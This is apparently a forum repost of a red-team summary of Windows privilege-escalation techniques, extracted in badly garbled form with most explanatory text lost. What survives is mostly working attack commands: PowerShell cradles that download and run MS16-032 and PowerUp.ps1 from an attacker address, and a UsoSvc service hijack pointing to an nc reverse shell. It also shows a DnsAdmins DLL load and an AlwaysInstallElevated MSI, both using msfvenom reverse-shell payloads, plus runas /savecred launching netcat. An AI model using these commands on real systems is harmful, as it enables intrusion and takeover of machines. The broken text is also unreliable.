[20359] 2020-08-11_红队测试之Windows提权小结

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2020-08-11_红队测试之Windows提权小结 W i n d o w s K h a n   2 0 2 0 - 0 8 - 1 1   0 5 7       5 7   2 7 0 2 1 0 L i n u x W i n d o w s W i n D L L 使 访 / W i n d o w s 1 .   2 .   3 .   D L L 4 .   5 .   r o o t 访   .  
M S 1 6 - 0 3 2 W i n d o w s w e s n g W i n d o w s W i n d o w s   E x p l o i t   S u g g e s t e r s s y s t e m i n f o 1 .   w e s n g p y t h o n   w e s . p y   - - u p d a t e 2 .   s y s t e m i n f o 使 w e s n g 3 3 . h t t p s : / / w w w . e x p l o i t - d b . c o m / e x p l o i t s / 3 9 7 1 9 使 p o w e r s h e l l h t t p s : / / g i t h u b . c o m / b i t s a d m i n / w e s n g . g i t P o w e r s h e l l   I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / X . X . X . X : 8 0 0 0 / m s 1 6 - 0 3 2 . p s 1 ' ) ; I n v o k e - M S 1 6 - 0 3 2
M i c r o s o f t   W i n d o w s     N T   使 使 W i n d o w s ( W i n d o w s   S e r v i c e s ) 使 s y s t e m 1 . 使 p o w e r u p . p s 1 p o w e r u p w i n d o w s d l l C V E - 2 0 1 9 - 1 3 2 2 U p d a t e   O r c h e s t r a t o r N T   A U T H O R I T Y S Y S T E M W i n d o w s   1 0 W i n d o w s   S e r v e r   2 0 1 9 使 p o w e r s h e l l p o w e r u p . p s 1 p o w e r u p . p s 1 I n v o k e A l l c h e c k s 使 p o w e r s h e l l U S O S V C h t t p s : / / g i t h u b . c o m / P o w e r S h e l l M a f i a / P o w e r S p l o i t / t r e e / m a s t e r / P r i v e s c P o w e r s h e l l   - e x e c   b y p a s s   I E X ( n e w - o b j e c t   N e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / 1 9 2 . 1 6 8 . 2 5 . 3 1 : 8 0 0 0 / P o w e r U p . p s 1 ' ) ;   I n v o k e A l l c h e c k s
2 . n c c s m s f   b i n P a t h = 1 U S O S V C   2 e x e n c s h e l l 3 P S   C : W i n d o w s s y s t e m 3 2 >   s c   s t o p   U s o S v c P S   C : W i n d o w s s y s t e m 3 2 >   s c   c o n f i g   u s o s v c   b i n P a t h =   " C : G i t S t a c k g i t p h p n c . e x e   1 9 2 . 1 6 8 . 2 5 . 3 1   4 4 5 5   - e   c m d . e x e " P S   C : W i n d o w s s y s t e m 3 2 >   s c   c o n f i g   u s o s v c   s t a r t = a u t o  
4 D L L D L L D L L 使 D L L D L L 访 使 D L L M i c r o s o f t D N S A d m i n s D L L m s f v e n o m s h e l l D L L P S   C : W i n d o w s s y s t e m 3 2 >   s c   s t a r t   u s o s v c
1 .   D N S A d m i n 2 . 使 m s f v e n o m s h e l l 3 .   s m b U N C D L L 4 .   d n s c m d D L L d n s c m s M s f v e n o m   - p   w i n d o w s / x 6 4 / s h e l l _ r e v e r s e _ t c p   L H O S T = X . X . X . X   L P O R T = 4 4 3   - f   d l l   - o   r e v . d l l P S   C : U s e r s >   d n s c m d . e x e   / c o n f i g   / s e r v e r l e v e l p l u g i n d l l   X . X . X . X s r e v . d l l R e g i s t r y   p r o p e r t y   s e r v e r l e v e l p l u g i n d l l   s u c c e s s f u l l y   r e s e t . C o m m a n d   c o m p l e t e d   s u c c e s s f u l l y . P S   C : U s e r s >   s c . e x e   r e s o l u t e   s t o p   d n s S E R V I C E _ N A M E :   d n s                 T Y P E                               :   1 0     W I N 3 2 _ O W N _ P R O C E S S                 S T A T E                             :   3     S T O P _ P E N D I N G                                                                 ( S T O P P A B L E ,   P A U S A B L E ,   A C C E P T S _ S H U T D O W N )                 W I N 3 2 _ E X I T _ C O D E         :   0     ( 0 x 0 )                 S E R V I C E _ E X I T _ C O D E     :   0     ( 0 x 0 )
5 . s y s t e m s h e l l A l w a y s I n s t a l l E l e v a t e d W i n d o w s M S I M S I M i c r o s o f t w i n d o w s   i n s t a l l e r 1 .   p o w e r u p . p s 1                 S E R V I C E _ E X I T _ C O D E     :   0     ( 0 x 0 )                 C H E C K P O I N T                   :   0 x 1                 W A I T _ H I N T                     :   0 x 7 5 3 0 *     P S   C : U s e r s >   s c . e x e   r e s o l u t e   s t a r t   d n s S E R V I C E _ N A M E :   d n s                 T Y P E                               :   1 0     W I N 3 2 _ O W N _ P R O C E S S                 S T A T E                             :   2     S T A R T _ P E N D I N G                                                                 ( N O T _ S T O P P A B L E ,   N O T _ P A U S A B L E ,   I G N O R E S _ S H U T D O W N )                 W I N 3 2 _ E X I T _ C O D E         :   0     ( 0 x 0 )                 S E R V I C E _ E X I T _ C O D E     :   0     ( 0 x 0 )                 C H E C K P O I N T                   :   0 x 0                 W A I T _ H I N T                     :   0 x 7 d 0                 P I D                                 :   2 6 4 4                 F L A G S                             : r e g   q u e r y   H K L M S O F T W A R E P o l i c i e s M i c r o s o f t W i n d o w s I n s t a l l e r   / v   A l w a y s I n s t a l l E l e v a t e d
2 .   使 m s f v e n o m m s i s h e l l 3 .   m s i s h e l l W i n d o w s 7 w i n d o w s ( W i n d o w s   V a u l t ) , W i n d o w W i n d o w s 访 W i n d o w s 使 W i n d o w s   V a u l t 使 使 使 1 . c m d k e y   / l i s t   a d m i n i s t r a t o r M s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = X . X . X . X   l p o r t = 4 5 6 7   - f   m s i   >   1 . m s i m s i e x e c   / q u i e t   / q n   / i   C : W i n d o w s T e m p 1 . m s i
2 . 使 r u n a s n c s h e l l 3 . s h e l l s h e l l s y s t e m R u n a s   / u s e r : a d m i n i s t r a t o r   / s a v e c r e d   " n c . e x e   - e   c m d . e x e   X . X . X . X   1 3 3 7 "
1 . E X P 2 . 3 . m y s q l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则